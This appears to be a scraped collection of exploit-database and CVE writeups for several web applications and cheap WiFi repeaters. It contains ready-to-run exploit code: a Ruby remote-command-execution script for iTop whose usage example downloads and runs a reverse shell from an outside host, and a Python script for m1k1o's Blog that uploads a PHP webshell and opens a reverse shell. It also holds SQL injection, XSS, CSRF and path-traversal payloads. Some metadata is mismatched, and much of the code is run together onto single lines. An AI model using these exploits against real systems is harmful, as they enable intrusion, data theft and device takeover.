Badminton Center Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via /bcms/classes/Master.php?f=save_court_rental.

Permalink

Cannot retrieve contributors at this time

**badminton-center-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Date: 2022-05-06

Vulnerability File: /bcms/classes/Master.php?f=save\_court\_rental

Vulnerability location: /bcms/classes/Master.php?f=save\_court\_rental, client\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /bcms/classes/Master.php?f=save_court_rental HTTP/1.1
    Host: bcms.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------176722279832480832321731227058
    Content-Length: 1164
    Origin: http://bcms.com
    Connection: keep-alive
    Referer: http://bcms.com/bcms/admin/?page=court_rentals/manage_court_rental&id=5
    Cookie: PHPSESSID=bruvaommkrfrt7tjj2m3mr8ui0
    
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="id"
    
    5
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="client_name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="contact"
    
    15115111511
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="court_id"
    
    3
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="court_price"
    
    450.00
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="datetime_start"
    
    0222-02-22T22:22
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="hours"
    
    22.00
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="datetime_end"
    
    
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="total"
    
    9900.00
    -----------------------------176722279832480832321731227058--

CVE-2022-30456: badminton-center-management-system/badminton-center-management-system-xss.md at main · mikeccltt/badminton-center-management-system

Merchandise Online Store 1.0 is vulnerable to SQL Injection via /vloggers_merch/classes/Master.php?f=delete_product.

Permalink

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/classes/Master.php?f=delete\_product

Vulnerability location: /vloggers\_merch/classes/Master.php?f=delete\_product, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /vloggers\_merch/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/vloggers\_merch/admin/?page=product
Content-Length: 65
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-30454: bug_report/SQL-1.md at main · mikeccltt/bug_report

iTop versions prior to 2.7.5 authenticated remote command execution exploit.

#!/usr/bin/env ruby# Exploit## Title: iTop < 2.7.6 - (Authenticated) Remote command execution## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)## Author website: https://pwn.by/noraj/## Exploit source: https://github.com/Acceis/exploit-CVE-2022-24780## Date: 2022-05-20## Vendor Homepage: https://www.combodo.com/itop## Software Link: https://github.com/Combodo/iTop/archive/refs/tags/2.7.5.tar.gz## Version: 2.x < 2.7.6 and 3.x.x-beta < 3.0.0## Tested on: iTop version 2.7.4 (Ubuntu 18.04.4 LTS - 7.3.28)# Vulnerability## Discoverer: Markus KRELL## Date: 2021-10-04## Discoverer website: https://markus-krell.de/## Discovered on iTop 2.7.4-7194 and 3.0.0-beta-7312## Title: Server-Side Template Injection inside customer Portal## CVE: CVE-2022-24780## CWE: CWE-94, CWE-1336## Patch:##   - https://github.com/Combodo/iTop/commit/b6fac4b411b8d145fc30fa35c66b51243eafd06b##   - https://github.com/Combodo/iTop/commit/eb2a615bd28100442c7f6171707bb40884af2305##   - https://github.com/Combodo/iTop/commit/93f273a28778e5da8e51096f021d2dc1adbf4ef3## References:##   - https://nvd.nist.gov/vuln/detail/CVE-2022-24780##   - https://github.com/Combodo/iTop/security/advisories/GHSA-v97m-wgxq-rh54##   - https://markus-krell.de/itop-template-injection-inside-customer-portal/require 'httpx'require 'docopt'require 'nokogiri'doc = <<~DOCOPT  iTop < 2.7.6 - (Authenticated) Remote command execution  Usage:    #{__FILE__} full <url> <username> <password> <cmd> [--debug]    #{__FILE__} light <url> <username> <password> <cmd> [--debug]    #{__FILE__} -h | --help    full: exploit with an emulated browser, execute JavaScript, preserve original user profile information    light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) reset user information: phone, location, function  Options:    <url>       Root URL (base path) including HTTP scheme, port and root folder    <username>  iTop portal username    <password>  iTop portal user password    <cmd>       Command to execute on the target    --debug     Display arguments    -h, --help  Show this screen  Examples:    #{__FILE__} full http://example.org john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt'    #{__FILE__} light https://example.org:5000/itop john 's9nvEIZnEo6ghi' 'curl --remote-name http://pentest.example.com:7000/revshell.pl; perl revshell.pl'DOCOPTdef login(root_url, user, pass, http)  login_url = "#{root_url}/pages/UI.php"  params = {    'auth_user' => user,    'auth_pwd' => pass,    'login_mode' => 'form',    'loginop' => 'login'  }  http.post(login_url, form: params).body.to_senddef login_watir(root_url, user, pass, browser)  login_url = "#{root_url}/pages/UI.php"  browser.goto login_url  browser.text_field(id: 'user').set(user)  browser.text_field(id: 'pwd').set(pass)  browser.button(value: 'Enter iTop').clickenddef fetch_form(root_url, http)  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  # Fetch and parse HTML document  doc = Nokogiri.HTML5(http.get(profile_url).body.to_s)  action = doc.css('form').first['action']  transaction_id = doc.css('input[name="transaction_id"]').first['value']  form_id = doc.css('form').first['id']  # doesn't work because it's populated with javascript, we'll need watir for that  #phone = doc.css('input[id^=field_phone]').first['value']  #location = doc.css('select[id^=field_location_id] option[selected]').first['value']  #function = doc.css('input[id^=field_function]').first['value']  return {action: action, tid: transaction_id, fid: form_id}enddef exploit(root_url, cmd, http, browser)  form_data = fetch_form(root_url, http)  vuln_url = "#{root_url}#{form_data[:action]}"  user_info = browser.nil? ? {phone: '', location: '', function: ''} : fetch_form_js(root_url, browser)  params = {    'operation' => 'submit',    'stimulus_code' => '',    'transaction_id' => form_data[:tid],    # source data already escapes backslashes and double quotes for JSON    # so \ -> \\ and " -> \"    # but we need to esacpe backslash once for Ruby too because we need an interpolated string    # so \ -> \\ -> \\\\ and " -> \\"    'formmanager_class' => 'Combodo\iTop\Portal\Form\ObjectFormManager',    'formmanager_data' => %Q^{"id":"#{form_data[:fid]}","transaction_id":"#{form_data[:tid]}","formmanager_class":"Combodo\\\\iTop\\\\Portal\\\\Form\\\\ObjectFormManager","formrenderer_class":"Combodo\\\\iTop\\\\Renderer\\\\Bootstrap\\\\BsFormRenderer","formrenderer_endpoint":"#{form_data[:action]}","formobject_class":"Person","formobject_id":"1","formmode":"edit","formactionrulestoken":"","formproperties":{"id":"default-user-profile","type":"custom_list","fields":[],"layout":{"type":"twig","content":"<div class=\\"form_field\\" data-field-id=\\"first_name{{['#{cmd}']|filter('system')}}\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"name\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"org_id\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"email\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"phone\\"></div><div class=\\"form_field\\" data-field-id=\\"location_id\\"></div><div class=\\"form_field\\" data-field-id=\\"function\\"></div><div class=\\"form_field\\" data-field-id=\\"manager_id\\" data-field-flags=\\"read_only\\"></div>"}}}^,    'current_values[phone]' => user_info[:phone],    'current_values[location_id]' => user_info[:location],    'current_values[function]' => user_info[:function]  }  http.post(vuln_url, form: params).body.to_senddef fetch_form_js(root_url, browser)  # those values can't be fetched with nokogiri alone sicne they are populated using javascript  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  browser.goto profile_url  phone = browser.text_field(name: 'phone').value  location = browser.select(name: 'location_id').selected_options.first.value  function = browser.text_field(name: 'function').value  return {phone: phone, location: location, function: function}endbegin  args = Docopt.docopt(doc)  pp args if args['--debug']  http = HTTPX.plugin(:cookies)  login(args['<url>'], args['<username>'], args['<password>'], http)  if args['full']    require 'watir'    require 'webdrivers'    b = Watir::Browser.new :firefox    login_watir(args['<url>'], args['<username>'], args['<password>'], b)  elsif args['light']    b = nil  end  exploit(args['<url>'], args['<cmd>'], http, b)rescue Docopt::Exit => e  puts e.messageend

iTop Remote Command Execution

m1k1o's Blog versions 1.3 and below suffer from an authenticated remote code execution vulnerability.

    # Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-01-06# Exploit Author: Malte V# Vendor Homepage: https://github.com/m1k1o/blog# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip# Version: 1.3 and below# Tested on: Linux# CVE : CVE-2022-23626import argparseimport jsonimport refrom base64 import b64encodeimport requests as reqfrom bs4 import BeautifulSoupparser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',                    required=False)parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,                    required=False)parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,                    required=False)parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)args = vars(parser.parse_args())username = args['username']password = args['password']lhost_ip = args['ip']lhost_port = args['lport']address = args['url']port = args['port']url = f"http://{address}:{port}"blog_cookie = ""csrf_token = ""exploit_file_name = ""header = {    "Host": f"{address}",    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",    "X-Requested-With": "XMLHttpRequest",    "Csrf-Token": f"{csrf_token}",    "Cookie": f"PHPSESSID={blog_cookie}"}def get_cookie(complete_url):    global blog_cookie    cookie_header = {}    if not blog_cookie:        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"    result = req.get(url=complete_url, headers=cookie_header)    if result.status_code == 200:        blog_cookie = result.cookies.get_dict()['PHPSESSID']        print(f'[+] Found PHPSESSID: {blog_cookie}')        grep_csrf(result)def grep_csrf(result):    global csrf_token    csrf_regex = r"[a-f0-9]{10}"    soup = BeautifulSoup(result.text, 'html.parser')    script_tag = str(soup.findAll('script')[1].contents[0])    csrf_token = re.search(csrf_regex, script_tag).group(0)    print(f'[+] Found CSRF-Token: {csrf_token}')def login(username, password):    get_cookie(url)    login_url = f"{url}/ajax.php"    login_data = f"action=login&nick={username}&pass={password}"    login_header = {        "Host": f"{address}",        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    result = req.post(url=login_url, headers=login_header, data=login_data)    soup = BeautifulSoup(result.text, 'html.parser')    login_content = json.loads(soup.text)    if login_content.get('logged_in'):        print('[*] Successful login')    else:        print('[!] Bad login')def set_cookie(result):    global blog_cookie    blog_cookie = result.cookies.get_dict()['PHPSESSID']def generate_payload(command):    return f"""-----------------------------13148889121752486353560141292Content-Disposition: form-data; name="file"; filename="malicious.gif.php"Content-Type: application/x-httpd-phpGIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;-----------------------------13148889121752486353560141292--"""def send_payload():    payload_header = {        "Host": f"{address}",        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"    payload = generate_payload(command)    print(f"[+] Upload exploit")    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})    set_exploit_file_name(result.content.decode('ascii'))def set_exploit_file_name(data):    global exploit_file_name    file_regex = r"[a-zA-Z0-9]{4,5}.php"    exploit_file_name = re.search(file_regex, data).group(0)def call_malicious_php(file_name):    global header    complete_url = f"{url}/data/i/{file_name}"    print('[*] Calling reverse shell')    result = req.get(url=complete_url)def check_reverse_shell():    yes = {'yes', 'y', 'ye', ''}    no = {'no', 'n'}    choice = input("Have you got an active netcat listener (y/Y or n/N): ")    if choice in yes:        return True    elif choice in no:        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")        return Falsedef main():    enabled_listener = check_reverse_shell()    if enabled_listener:        login(username, password)        send_payload()        call_malicious_php(exploit_file_name)if __name__ == "__main__":    main()

m1k1o's Blog 1.3 Remote Code Execution

OpenCart Newsletter module version 3.0.2.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi# Date: 19/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez# Version: v.3.0.2.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivezemez_newsletter_email=saud===========Output :Parameter: zemez_newsletter_email (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

OpenCart Newsletter 3.0.2.0 SQL Injection

The Curtain WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed

    # Exploit Title: Multiple Stored Cross-Site Scripting vulnerabilitiesin WordPress curtain plugin 1.0.2# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/curtain/# Version: 1.0.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# DescriptionSeveral Cross-Site Scripting vulnerabilities in the Curtain WordPressplugin. Due to these Cross-Site Scripting vulnerabilities, an attackerwould be able to steal cookies, hijack sessions,s or control the browser ofthe victim.*Reproduce XSS in Heading Section:*1- Login to your WordPress Application2- Install curtain plugin3- Open the pagehttp://wordpressURL/wp-admin/options-general.php?page=curtain4- Inject Payload in Heading"><h1 onclick=alert(1)>XSS</h1>5- An alert will trigger.*Reproduce XSS in Managers Textarea Section:*1- Login to your WordPress Application2- Install curtain plugin3- Open the pagehttp://wordpressURL/wp-admin/options-general.php?page=curtain4- Inject Payload in Managers as"></textarea><script>alert(1)</script>5- An alert will trigger.

CVE-2022-1558: WordPress Curtain 1.0.2 Cross Site Scripting ≈ Packet Storm

A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).

Permalink

**Gitblit Path Traversal****Description**

Gitblit is an open source, pure Java Git solution for managing, viewing, and serving **Git** repositories. There is a **Path Traversal** vulnerability in Gitblit V1.9.3 which can read website files.

**Proof of Concept**

read web.xml

    GET /resources//../WEB-INF/web.xml HTTP/1.1
    Host: 127.0.0.1:8083
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=1arfn8db09ors1a3p1837sgxmh; Gitblit=a9d7b582ef204ffbd9cc2ff18f01d603c069fbeb
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    
    
    

read pom.xml

    GET /resources//../META-INF/maven/com.gitblit/gitblit/pom.xml HTTP/1.1
    Host: 127.0.0.1:8083
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=1arfn8db09ors1a3p1837sgxmh; Gitblit=a9d7b582ef204ffbd9cc2ff18f01d603c069fbeb
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1

CVE-2022-31268: Vuls/gitblit V1.9.3 path traversal.md at main · metaStor/Vuls

Pix-Link MiNi Router 28K.MiniRouter.20190211 was discovered to contain a stored cross-site scripting (XSS) vulnerability due to an unsanitized Security Key parameter.

Security analysis of some low-cost WiFi Repeaters

Many of us have had to choose a WiFi repeater to extend the wireless coverage of home routers. Nowadays, such device types are spreading fast and sometimes low-cost and poorly configured ones might severely harm the security and privacy of your home network, including devices commonly attached to it.

The problem is exacerbated by the huge amount of vendors selling these devices at quite low prices, which render them the most attractive choice for majority of the people. However, what most people should be aware of is that their low-cost devices might lead to… well.. other kind of costs!  
Unfortunately, sometimes these costs may be higher than if you had chosen a different, more expensive device.

_Why_ these devices?

*   They are not _too_ expensive (about 15€).  
    Thus, they are the most attractive choice for less-aware customers.
*   They are among the very first results provided by Amazon (not just the Italian version) when you search for keywords like “WiFi Repeater/Extender”.
*   At the time of writing, the second device was considered an Amazon’s Choice (Amazon IT). Therefore, most likely, many of them have already been sold.

The following sections summarize the vulnerabilities I found as a result of my analysis. The next section will briefly discuss, for each device analyzed, the vulnerabilities with an assigned CVE ID I’ve been able to found as well as other minor security-related issues affecting the involved devices.

To fix such vulnerabilities you should update your device’s firmware to the latest available version but sometimes, with poorly configured firmwares (perhaps bugs?!), you won’t even be allowed to download software updates, leaving you with only two choices: either you stay vulnerable or you replace the device at all.

Device (**1/3**): Acexy Wireless-N WiFi Repeater REV 1.0  
Firmware: 28.08.06.1

****CVE-2021–28160 — SSID Reflected XSS****

As with every WiFi Repeater, you have to choose the wireless network which range you wish to extend, providing the password (if any) of its wireless AP.

The page shown above, “/repeater.html”, allows to select the network and displays the available wireless APs without applying any kind of sanitization on the data included into the HTML page, which is rendered by the browser.

Therefore, by modifying the SSID of a wireless network such as the following you can achieve JavaScript code executed every time a user visit the page _repeater.html_ or, more in general, when a user just click on the “Repeater Wizard” section on the homepage.

<img src=no onerror=alert(1) foo

**CVE-2021–28936— Improper Access Control on password reset requests**

An Improper Access Control (CWE-284) vulnerability allows any device to change the Web management interface password by sending just one specially crafted HTTP GET request, without requiring any previous authentication.

In order to exploit the vulnerability you need to know the current management interface account name (by default**_,_** it is **_admin_**).  
The following curl command change the management interface password to “_mystrongpass123_”, assuming the account name is _admin_ and the IP address of the device is the default one (192.168.10.1).

curl -i -s -o /dev/null -w "%{http\_code}" -k -X $'GET' \\  
    -H $'Host: 192.168.10.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: \*/\*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://192.168.10.1/password.html' -H $'Content-Length: 4' \\  
    --data-binary $'\\x0d\\x0a\\x0d\\x0a' \\  
    $'**http://192.168.10.1/login.htm**?CMD=SYS&GO=login.htm&SET0=18416128=en&SET1=17498624=**admin**&SET2=16843264=**mystrongpass123**&rd=0.7548039925199851&\_=1615725324336'

Once the request is handled successfully, just try to login with the password you provided earlier.

**CVE-2021–28937— Plaintext password reflected in /password.html page**

The web management interface password is included in the /_password.html_ HTML page, which contains a form for changing the username and the password.

To exploit this vulnerability just visit the URL _http://192.168.10.1/password.html_ and inspect the returned HTML element with any browser you prefer.

This kind of password disclosure also implies the device stores the password as a plaintext, without computing any hash value.

**Others**

*   HTTPS is never used and HTTP traffic can be easily intercepted on a LAN.

Username and password are sent unencrypted during authentication and, additionally, every time you visit _/password.html_ you give to a potential attacker the chance to read your current username and password (both included in the HTML document).

*   Telnet service listening on port 23.

The default username is easy to guess (**_admin_**) but the password is not among the most trivial or common ones. I didn’t manage to guess the password though you might be luckier, or just better than me at generating password lists.

**Device** (**2/3**): SOOTEWAY Wi-Fi Range Extender V1.5  
Firmware: apparently no firmware updates  
Arch: MIPS

**CVE-2021–30028 — Weak credentials lead to remote firmware read/write/erasure**

The device shown above also has some vulnerabilities.  
In particular, a Telnet service is listening on port 23 and default credentials are among the most common ones (**admin**:**admin**). However, what is worse is that after the login succeeds, the service provides a complete set of instructions that allows a potential adversary to do literally anything with your WiFi Repeater. He might be able to modify the device configuration like changing the repeater password, modify CPU registers values and even flash/overwrite the firmware. All of these can be done remotely.

For instance, it would be possible to compromise the device forever, overwriting part of the firmware and preventing the factory reset. The following two screenshots show the things an attacker would have access to and also one way he could stop the correct functioning of the device _permanently_.

From this moment on, the WiFi Repeater becomes literally useless and must be replaced. Finally, it appears that no firmware update is foreseen, therefore you should either buy a new device or keep your vulnerable one as it was mentioned initially.

**Device** (**3/3**): Pix-Link MiNi Router  
Firmware: v28K.MiniRouter.20190211

The firmware installed on this device also does not sanitize user-supplied input. This led to the discovery of two stored XSS vulnerabilities (**CVE-2021–43728** and **CVE-2021–43729**) affecting the SSID and wireless security key values respectively.

To replicate the simple XSS _alert_ POC just intercept the request sent when you _Apply_ changes from _Advance>Wireless_ setting page through a proxy (e.g. Burp community will suffice). Note that intercept/modify is required to overcome the character limitation.

Once our crafted value is set it will be enough to visit the extender home page to trigger the JS alert as depicted by the next screenshot.

Regarding the second issue (CVE-2021–43729):  
\- Enter your XSS payload in the same Wireless setting page mentioned above  
\- Apply changes

Then just connect back to the WiFi extender providing the payload itself as password. The JS alert will spawn as soon as the home page is visited:

**Conclusion**

When a software/hardware device, or a product in general, is sold at much lower prices than others there are usually reasons. Such reasons may vary, including bad implementation choices, less development or testing effort and security vulnerabilities too. However, since even the most expensive devices might be vulnerable you should (at least) try to choose wisely when it comes to your home network security.

There are plenty more expensive WiFi extenders I might suggest, such as this one by TP-Link. However, I’d like to avoid so since even that one has an interesting client-side encryption which should be reversed to see what it’s intended to hide :)

CVE-2021-43729: Hunting for Vulnerabilities in Low-Cost WiFi Repeaters

Foxit PDF Editor v11.3.1 was discovered to contain an arbitrary file upload vulnerability.

CVE-2022-28104: Security Bulletins | Foxit Software

A Cross-Site Request Forgery (CSRF) in Online Banquet Booking System v1.0 allows attackers to change admin credentials via a crafted POST request.

# Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Description :The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request.# HTTPS Request :POST /obbs/admin/admin-profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 86Origin: http://localhostConnection: closeReferer: http://localhost/obbs/admin/admin-profile.phpCookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3eUpgrade-Insecure-Requests: 1adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=# Poc Html :<html>    <body>  <script>history.pushState('', '', '/')</script>    <form action="http://localhost/obbs/admin/admin-profile.php" method="POST">      <input type="hidden" name="adminname" value="Admin" />      <input type="hidden" name="username" value="admin" />      <input type="hidden" name="email" value="admin@gmail.com" />      <input type="hidden" name="mobilenumber" value="123" />      <input type="hidden" name="submit" value="" />      <input type="submit" value="Submit request" />    </form>  </body></html>

Tag

#firefox